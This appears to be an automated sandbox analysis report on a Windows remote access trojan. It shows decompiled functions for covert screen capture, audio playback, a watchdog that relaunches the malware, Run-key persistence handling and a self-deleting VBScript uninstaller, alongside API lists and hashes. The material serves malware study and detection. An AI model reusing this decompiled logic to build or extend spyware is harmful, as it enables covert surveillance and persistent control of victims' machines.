                                                                                                										_push(0x2eb6edc);
                                                                                                										L25:
                                                                                                										_t234 = LocalAlloc(0x40, ??);
                                                                                                										_t204 = 0x18;
                                                                                                										_t234->bmiHeader = 0x28;
                                                                                                										_t234->bmiHeader.biWidth = _v120;
                                                                                                										_t234->bmiHeader.biHeight = _v116;
                                                                                                										_t234->bmiHeader.biPlanes = _v108;
                                                                                                										_t234->bmiHeader.biBitCount = _v106;
                                                                                                										_t140 = _a4;
                                                                                                										__eflags = _t140 - _t204;
                                                                                                										if(_t140 < _t204) {
                                                                                                											__eflags = 1;
                                                                                                											_t234->bmiHeader.biClrUsed = 1 << _t140;
                                                                                                										}
                                                                                                										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
                                                                                                										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
                                                                                                										asm("cdq");
                                                                                                										_t227 = _t226 & 0x00000007;
                                                                                                										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
                                                                                                										_t234->bmiHeader.biSizeImage = _t146;
                                                                                                										_t147 = GlobalAlloc(0, _t146);
                                                                                                										_a4 = _t147;
                                                                                                										__eflags = _t147;
                                                                                                										if(_t147 != 0) {
                                                                                                											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
                                                                                                											__eflags = _t149;
                                                                                                											if(_t149 != 0) {
                                                                                                												_v56 = 0x4d42;
                                                                                                												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                                                                                                												_v50 = 0;
                                                                                                												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                                                                                                												__eflags = _t157;
                                                                                                												_v46 = _t157;
                                                                                                												E004020C7(_t194,  &_v80);
                                                                                                												E004020C7(_t194,  &_v168);
                                                                                                												E0040250F(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
                                                                                                												E00403428( &_v80);
                                                                                                												E0040250F(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
                                                                                                												E00403428( &_v80);
                                                                                                												_t235 = _a4;
                                                                                                												E0040250F(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
                                                                                                												E00403428( &_v80);
                                                                                                												DeleteObject(_v12);
                                                                                                												GlobalFree(_t235);
                                                                                                												DeleteDC(_v20);
                                                                                                												DeleteDC(_t228);
                                                                                                												E00402036(_t194, _t194, __eflags,  &_v168);
                                                                                                												E00401FB9();
                                                                                                												E00401FB9();
                                                                                                												goto L32;
                                                                                                											}
                                                                                                											DeleteDC(_v20);
                                                                                                											DeleteDC(_t228);
                                                                                                											DeleteObject(_v12);
                                                                                                											GlobalFree(_a4);
                                                                                                											goto L2;
                                                                                                										} else {
                                                                                                											_push(_v20);
                                                                                                											L8:
                                                                                                											DeleteDC();
                                                                                                											DeleteDC(_t228);
                                                                                                											_push(_v12);
                                                                                                											goto L5;
                                                                                                										}
                                                                                                									}
                                                                                                									_push(8);
                                                                                                									_pop(1);
                                                                                                									_a4 = 1;
                                                                                                									__eflags = _t226 - 1;
                                                                                                									if(_t226 <= 1) {
                                                                                                										goto L24;
                                                                                                									}
                                                                                                									_push(0x10);
                                                                                                									_pop(1);
                                                                                                									_a4 = 1;
                                                                                                									__eflags = _t226 - 1;
                                                                                                									if(_t226 <= 1) {
                                                                                                										goto L24;
                                                                                                									}
                                                                                                									_t223 = 0x18;
                                                                                                									__eflags = _t226 - _t223;
                                                                                                									if(_t226 > _t223) {
                                                                                                										_push(0x20);
                                                                                                										_pop(1);
                                                                                                										L23:
                                                                                                										_a4 = 1;
                                                                                                										goto L24;
                                                                                                									}
                                                                                                									_a4 = _t223;
                                                                                                									_push(0x28);
                                                                                                									goto L25;
                                                                                                								}
                                                                                                								goto L23;
                                                                                                							}
                                                                                                						}
                                                                                                						L7:
                                                                                                						_push(_t232);
                                                                                                						goto L8;
                                                                                                					} else {
                                                                                                						DeleteDC(_t232);
                                                                                                						DeleteDC(_t228);
                                                                                                						_push(0);
                                                                                                						L5:
                                                                                                						DeleteObject();
                                                                                                						goto L2;
                                                                                                					}
                                                                                                				} else {
                                                                                                					L2:
                                                                                                					E00402076(_t194, _t194, 0x460734);
                                                                                                					L32:
                                                                                                					return _t194;
                                                                                                				}
                                                                                                			}


















































                                                                                                APIs
                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00415305
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00415311
                                                                                                  • Part of subcall function 00415721: GetMonitorInfoW.USER32(?,?), ref: 00415741
                                                                                                  • Part of subcall function 0041576D: GetMonitorInfoW.USER32(?,?), ref: 0041578D
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041535F
                                                                                                • DeleteDC.GDI32(00000000), ref: 00415373
                                                                                                • DeleteDC.GDI32(00000000), ref: 00415376
                                                                                                • DeleteObject.GDI32(?), ref: 0041537A
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00415384
                                                                                                • DeleteDC.GDI32(00000000), ref: 00415395
                                                                                                • DeleteDC.GDI32(00000000), ref: 00415398
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 004153D4
                                                                                                • GetCursorInfo.USER32(?,?,?), ref: 004153EF
                                                                                                • GetIconInfo.USER32(?,?), ref: 00415403
                                                                                                • DeleteObject.GDI32(?), ref: 00415428
                                                                                                • DeleteObject.GDI32(?), ref: 00415431
                                                                                                • DrawIcon.USER32 ref: 00415440
                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00415454
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 004154BA
                                                                                                • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00415523
                                                                                                • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00415547
                                                                                                • DeleteDC.GDI32(?), ref: 0041555A
                                                                                                • DeleteDC.GDI32(00000000), ref: 0041555D
                                                                                                • DeleteObject.GDI32(?), ref: 00415562
                                                                                                • GlobalFree.KERNEL32 ref: 0041556C
                                                                                                • DeleteObject.GDI32(?), ref: 00415611
                                                                                                • GlobalFree.KERNEL32 ref: 00415618
                                                                                                • DeleteDC.GDI32(?), ref: 00415627
                                                                                                • DeleteDC.GDI32(00000000), ref: 0041562A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
                                                                                                • String ID: DISPLAY
                                                                                                • API String ID: 517350757-865373369
                                                                                                • Opcode ID: bc7ef3eaa0bc30b32919019b5e7ab841a487349196d5c5f6ca233514da78b53b
                                                                                                • Instruction ID: 92214f8bc41d115a4ee1bbf9b644f4e186d6fd6add950f8e9c2f91f818141afe
                                                                                                • Opcode Fuzzy Hash: bc7ef3eaa0bc30b32919019b5e7ab841a487349196d5c5f6ca233514da78b53b
                                                                                                • Instruction Fuzzy Hash: DDB18075900618EFDB14DFA0DC45BEEBBB8EF44715F10402AF949EB290DB74A984CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E00417382(void* __ecx, void* __edx, char _a4) {
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v100;
                                                                                                				char _v124;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* _t25;
                                                                                                				void* _t28;
                                                                                                				void* _t43;
                                                                                                				void* _t60;
                                                                                                				void* _t63;
                                                                                                				void* _t67;
                                                                                                				CHAR* _t89;
                                                                                                				void* _t109;
                                                                                                				CHAR* _t110;
                                                                                                				void* _t111;
                                                                                                				void* _t114;
                                                                                                				void* _t118;
                                                                                                
                                                                                                				_t103 = __edx;
                                                                                                				_t67 = __ecx;
                                                                                                				_t109 = __edx;
                                                                                                				if(E004175C8( &_a4, __ecx, __ecx) == 0xffffffff) {
                                                                                                					_t63 = E00401EDD( &_a4);
                                                                                                					_t103 = 0x30;
                                                                                                					E00401EEC( &_a4, 0x30, _t111, E00418A4B( &_v28, 0x30, _t63));
                                                                                                					E00401EE2();
                                                                                                				}
                                                                                                				_t25 = E0040247B();
                                                                                                				_t120 = _t25;
                                                                                                				if(_t25 == 0) {
                                                                                                					__eflags = PathFileExistsW(E00401EDD( &_a4));
                                                                                                					if(__eflags != 0) {
                                                                                                						goto L4;
                                                                                                					} else {
                                                                                                						E00402076(_t67, _t114 - 0x18, 0x460734);
                                                                                                						_push(0xa8);
                                                                                                						E00404BB7(_t67, 0x46eb60, _t103, __eflags);
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t60 = E00401EDD( &_a4);
                                                                                                					_t118 = _t114 - 0x18;
                                                                                                					E004020DE(_t67, _t118, _t103, _t120, _t109);
                                                                                                					E0041843E(_t60);
                                                                                                					_t114 = _t118 + 0x18;
                                                                                                					L4:
                                                                                                					_t28 = E00417CCA( &_v124, _t67);
                                                                                                					_t108 = E00403022( &_v28, E00403098(_t67,  &_v76, E00409E9E( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
                                                                                                					E00403098(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					mciSendStringW(E00401EDD( &_v52), 0, 0, 0);
                                                                                                					mciSendStringA("play audio", 0, 0, 0);
                                                                                                					_t115 = _t114 - 0x18;
                                                                                                					E00402076(0, _t114 - 0x18, 0x460734);
                                                                                                					_push(0xa9);
                                                                                                					E00404BB7(0, 0x46eb60, _t32, 0);
                                                                                                					_t43 = CreateEventA(0, 1, 0, 0);
                                                                                                					while(1) {
                                                                                                						L5:
                                                                                                						 *0x46de9c = _t43;
                                                                                                						while(1) {
                                                                                                							_t122 = _t43;
                                                                                                							if(_t43 == 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							__eflags =  *0x46de9a; // 0x0
                                                                                                							if(__eflags != 0) {
                                                                                                								mciSendStringA("pause audio", 0, 0, 0);
                                                                                                								 *0x46de9a = 0;
                                                                                                							}
                                                                                                							__eflags =  *0x46de99; // 0x0
                                                                                                							if(__eflags != 0) {
                                                                                                								mciSendStringA("resume audio", 0, 0, 0);
                                                                                                								 *0x46de99 = 0;
                                                                                                							}
                                                                                                							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
                                                                                                							_t108 =  &_v24;
                                                                                                							_t110 = "stopped";
                                                                                                							_t89 = 0;
                                                                                                							while(1) {
                                                                                                								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
                                                                                                								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t89 = _t89 + 1;
                                                                                                								__eflags = _t89 - 8;
                                                                                                								if(_t89 != 8) {
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									SetEvent( *0x46de9c);
                                                                                                								}
                                                                                                								break;
                                                                                                							}
                                                                                                							__eflags = WaitForSingleObject( *0x46de9c, 0x1f4);
                                                                                                							if(__eflags != 0) {
                                                                                                								_t43 =  *0x46de9c; // 0x0
                                                                                                							} else {
                                                                                                								CloseHandle( *0x46de9c);
                                                                                                								_t43 = 0;
                                                                                                								goto L5;
                                                                                                							}
                                                                                                						}
                                                                                                						mciSendStringA("stop audio", 0, 0, 0);
                                                                                                						mciSendStringA("close audio", 0, 0, 0);
                                                                                                						E00402076(0, _t115 - 0x18, 0x460734);
                                                                                                						_push(0xaa);
                                                                                                						E00404BB7(0, 0x46eb60, _t108, _t122);
                                                                                                						E00401EE2();
                                                                                                						goto L21;
                                                                                                					}
                                                                                                				}
                                                                                                				L21:
                                                                                                				return E00401EE2();
                                                                                                			}

                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00417467
                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041747B
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00460734), ref: 004174A0
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,0046E250,00000000), ref: 004174B6
                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 004174F7
                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041750F
                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00417523
                                                                                                • SetEvent.KERNEL32 ref: 00417544
                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 00417555
                                                                                                • CloseHandle.KERNEL32 ref: 00417565
                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00417587
                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00417591
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                • String ID: alias audio$" type $`F$`F$`F$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                • API String ID: 738084811-3238727370
                                                                                                • Opcode ID: 84a5a2df212cece98ef6f13e60bfa61e96272978f9ebe182fcaae50cecadf0ae
                                                                                                • Instruction ID: a95081da255d8c9c391adb4703ecece35ef243cada4fea7cc53d17a4b1729a4c
                                                                                                • Opcode Fuzzy Hash: 84a5a2df212cece98ef6f13e60bfa61e96272978f9ebe182fcaae50cecadf0ae
                                                                                                • Instruction Fuzzy Hash: 1E51C370B002087AD704FBB6DC92DBE3B6DDB50748B10403FF506AA1E6EE795D4586AE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 98%
                                                                                                			E0040B106(char _a4) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v100;
                                                                                                				char _v124;
                                                                                                				char _v148;
                                                                                                				char _v172;
                                                                                                				short _v692;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __ebp;
                                                                                                				void* _t53;
                                                                                                				void* _t54;
                                                                                                				void* _t57;
                                                                                                				signed int _t61;
                                                                                                				void* _t62;
                                                                                                				void* _t78;
                                                                                                				void* _t79;
                                                                                                				void* _t92;
                                                                                                				void* _t93;
                                                                                                				signed char _t134;
                                                                                                				void* _t243;
                                                                                                				void* _t245;
                                                                                                				void* _t246;
                                                                                                				void* _t247;
                                                                                                
                                                                                                				E00410199();
                                                                                                				if( *0x46c9c4 != 0x30) {
                                                                                                					E00409DA8();
                                                                                                				}
                                                                                                				_t243 =  *0x46dd5f - 1; // 0x0
                                                                                                				if(_t243 == 0) {
                                                                                                					E00415D62(_t243);
                                                                                                				}
                                                                                                				if( *0x46da75 != 0) {
                                                                                                					E00418144(E00401EDD(0x46e0d4));
                                                                                                				}
                                                                                                				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                                                                                				_t245 =  *0x46daf6 - 1; // 0x1
                                                                                                				if(_t245 == 0) {
                                                                                                					E00410D8B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EDD(0x46e578));
                                                                                                				}
                                                                                                				_t246 =  *0x46daef - 1; // 0x0
                                                                                                				if(_t246 == 0) {
                                                                                                					E00410D8B(0x80000002, _t231, E00401EDD(0x46e578));
                                                                                                				}
                                                                                                				_t247 =  *0x46daf4 - 1; // 0x0
                                                                                                				if(_t247 == 0) {
                                                                                                					E00410D8B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EDD(0x46e578));
                                                                                                				}
                                                                                                				_t53 = E0040247B();
                                                                                                				_t54 = E00401F87(0x46e5f0);
                                                                                                				_t57 = E00410A5F(E00401F87(0x46e5a8), "exepath",  &_v692, 0x208, _t54, _t53);
                                                                                                				_t248 = _t57;
                                                                                                				if(_t57 == 0) {
                                                                                                					GetModuleFileNameW(0,  &_v692, 0x208);
                                                                                                				}
                                                                                                				RegDeleteKeyA(0x80000001, E00401F87(0x46e5a8));
                                                                                                				_t61 = SetFileAttributesW( &_v692, 0x80);
                                                                                                				_t140 = 0x46e5c0;
                                                                                                				asm("sbb bl, bl");
                                                                                                				_t134 =  ~_t61 & 0x00000001;
                                                                                                				_t62 = E00407647(_t248);
                                                                                                				_t249 = _t62;
                                                                                                				if(_t62 != 0) {
                                                                                                					_t140 = 0x46e5c0;
                                                                                                					SetFileAttributesW(E00401EDD(0x46e5c0), 0x80);
                                                                                                				}
                                                                                                				E00403098(_t134,  &_v124, E00404260(_t134,  &_v52, E00437AEF(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
                                                                                                				E00401EE2();
                                                                                                				E004043E6(_t134,  &_v28, L"On Error Resume Next\n", _t249, E00404260(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                                                                                                				E00401EE2();
                                                                                                				_t250 = _t134;
                                                                                                				if(_t134 != 0) {
                                                                                                					E00403303(E00403098(_t134,  &_v52, E004043E6(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E00404260(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                				}
                                                                                                				E00403303(E00403098(_t134,  &_v100, E00403098(_t134,  &_v76, E00404260(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				_t251 = _t134;
                                                                                                				if(_t134 != 0) {
                                                                                                					E0040778C(_t134,  &_v28, 0, L"wend\n");
                                                                                                				}
                                                                                                				_t78 = E00407647(_t251);
                                                                                                				_t252 = _t78;
                                                                                                				if(_t78 != 0) {
                                                                                                					E00403303(E00403098(0x46079c,  &_v100, E00409E9E( &_v76, L"fso.DeleteFolder \"", _t252, 0x46e5c0), 0, _t252, L"\"\n"));
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                				}
                                                                                                				_t79 = E00404260(0x46079c,  &_v172, L"\"\"\", 0");
                                                                                                				E00403303(E00403098(0x46079c,  &_v100, E00403022( &_v76, E0040440A(0x46079c,  &_v52, E00404260(0x46079c,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E0040778C(0x46079c,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                                                				_t92 = E00401EDD( &_v124);
                                                                                                				_t93 = E0040247B();
                                                                                                				if(E00418337(E00401EDD( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401EDD( &_v124), 0x46079c, 0x46079c, 0) > 0x20) {
                                                                                                					ExitProcess(0);
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				return E00401EE2();
                                                                                                			}


                                                                                                APIs
                                                                                                  • Part of subcall function 00410199: TerminateProcess.KERNEL32(00000000,?,0040ADB9), ref: 004101A9
                                                                                                  • Part of subcall function 00410199: WaitForSingleObject.KERNEL32(000000FF,?,0040ADB9), ref: 004101BC
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1FF
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B212
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B22A
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B258
                                                                                                  • Part of subcall function 00409DA8: TerminateThread.KERNEL32(00408881,00000000,?,0040ADC7), ref: 00409DB7
                                                                                                  • Part of subcall function 00409DA8: UnhookWindowsHookEx.USER32(00000000), ref: 00409DC7
                                                                                                  • Part of subcall function 00409DA8: TerminateThread.KERNEL32(Function_00008866,00000000,?,0040ADC7), ref: 00409DD9
                                                                                                  • Part of subcall function 00418337: CreateFileW.KERNELBASE(00405F06,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,00418461,00000000,00000000), ref: 00418376
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,0046079C,0046079C,00000000), ref: 0040B47B
                                                                                                • ExitProcess.KERNEL32 ref: 0040B487
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: """, 0$")$0f$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("$x(f
                                                                                                • API String ID: 1861856835-2189821385
                                                                                                • Opcode ID: 1b3773f33782ea4df630d354779f34fe65719c9eda1c0bb3231cc2d60f97e349
                                                                                                • Instruction ID: 943384c39921bc6d563c0f7d59a9bdf134d260cf3cda96db00c0ddd81e813327
                                                                                                • Opcode Fuzzy Hash: 1b3773f33782ea4df630d354779f34fe65719c9eda1c0bb3231cc2d60f97e349
                                                                                                • Instruction Fuzzy Hash: 3D919171A001185ACB04FBA2DCA6AEE7769AF50308F14007FF506B71E2EF785E46869D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E0040FDD3() {
                                                                                                				long _v8;
                                                                                                				char _v32;
                                                                                                				short _v556;
                                                                                                				short _v1076;
                                                                                                				short _v1596;
                                                                                                				short _v2116;
                                                                                                				void* _t27;
                                                                                                				void* _t28;
                                                                                                				void* _t31;
                                                                                                				long _t37;
                                                                                                				int _t41;
                                                                                                				long _t50;
                                                                                                				void* _t55;
                                                                                                				void* _t68;
                                                                                                				void* _t70;
                                                                                                				int _t71;
                                                                                                				void* _t72;
                                                                                                				long _t73;
                                                                                                				void* _t110;
                                                                                                				void* _t112;
                                                                                                				void* _t115;
                                                                                                				void* _t116;
                                                                                                
                                                                                                				_t71 = 0;
                                                                                                				_v8 = _t73;
                                                                                                				CreateMutexA(0, 1, "Mutex_RemWatchdog");
                                                                                                				GetModuleFileNameW(0,  &_v2116, 0x104);
                                                                                                				_t27 = E0040247B();
                                                                                                				_t28 = E00401F87(0x46e5f0);
                                                                                                				_t108 = 0x46e5a8;
                                                                                                				_t31 = E00410A5F(E00401F87(0x46e5a8), "exepath",  &_v556, 0x208, _t28, _t27);
                                                                                                				_t116 = _t115 + 0x14;
                                                                                                				if(_t31 != 0) {
                                                                                                					E004020C7(0,  &_v32);
                                                                                                					if(E004183CC( &_v556,  &_v32) == 0) {
                                                                                                						goto L1;
                                                                                                					}
                                                                                                					_t110 = OpenProcess(0x100000, 0, _v8);
                                                                                                					WaitForSingleObject(_t110, 0xffffffff);
                                                                                                					CloseHandle(_t110);
                                                                                                					_t37 = GetCurrentProcessId();
                                                                                                					if(E00410BDF(0x46e5a8, E00401F87(0x46e5a8), "WDH", _t37) == 0) {
                                                                                                						L18:
                                                                                                						_push(1);
                                                                                                						L2:
                                                                                                						ExitProcess();
                                                                                                					}
                                                                                                					_t108 = ShellExecuteW;
                                                                                                					do {
                                                                                                						_t41 = PathFileExistsW( &_v556);
                                                                                                						_t42 =  &_v556;
                                                                                                						if(_t41 != 0) {
                                                                                                							L11:
                                                                                                							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
                                                                                                							L12:
                                                                                                							do {
                                                                                                								_t72 = E004108B4(E00401F87(0x46e5a8), "WD",  &_v8);
                                                                                                								_t122 = _t72;
                                                                                                								if(_t72 == 0) {
                                                                                                									Sleep(0x1f4);
                                                                                                								} else {
                                                                                                									E00410D11(E00401F87(0x46e5a8), _t122, "WD");
                                                                                                								}
                                                                                                							} while (_t72 == 0);
                                                                                                							goto L17;
                                                                                                						}
                                                                                                						_t55 = E0040247B();
                                                                                                						if(E00418337(E00401F87( &_v32), _t55,  &_v556, _t71) == 0) {
                                                                                                							E00432D80(_t108,  &_v1596, _t71, 0x208);
                                                                                                							_t116 = _t116 + 0xc;
                                                                                                							GetTempPathW(0x104,  &_v1596);
                                                                                                							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
                                                                                                							lstrcatW( &_v1076, L".exe");
                                                                                                							_t68 = E0040247B();
                                                                                                							_t70 = E00418337(E00401F87( &_v32), _t68,  &_v1076, _t71);
                                                                                                							__eflags = _t70;
                                                                                                							if(_t70 == 0) {
                                                                                                								goto L12;
                                                                                                							}
                                                                                                							_t42 =  &_v1076;
                                                                                                							goto L11;
                                                                                                						}
                                                                                                						_t42 =  &_v556;
                                                                                                						goto L11;
                                                                                                						L17:
                                                                                                						_t71 = 0;
                                                                                                						_t112 = OpenProcess(0x100000, 0, _v8);
                                                                                                						WaitForSingleObject(_t112, 0xffffffff);
                                                                                                						CloseHandle(_t112);
                                                                                                						_t50 = GetCurrentProcessId();
                                                                                                					} while (E00410BDF(0x46e5a8, E00401F87(0x46e5a8), "WDH", _t50) != 0);
                                                                                                					goto L18;
                                                                                                				}
                                                                                                				L1:
                                                                                                				_push(_t71);
                                                                                                				goto L2;
                                                                                                			}


























                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,hpg,0046E5A8,00000000), ref: 0040FDEC
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040FDFF
                                                                                                  • Part of subcall function 00410A5F: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00410A7B
                                                                                                  • Part of subcall function 00410A5F: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410A94
                                                                                                  • Part of subcall function 00410A5F: RegCloseKey.ADVAPI32(00000000), ref: 00410A9F
                                                                                                • ExitProcess.KERNEL32 ref: 0040FE46
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040FE6F
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040FE7A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FE81
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FE87
                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040FEB8
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040FF87
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040FFDD
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040FFE8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FFEF
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FFF5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
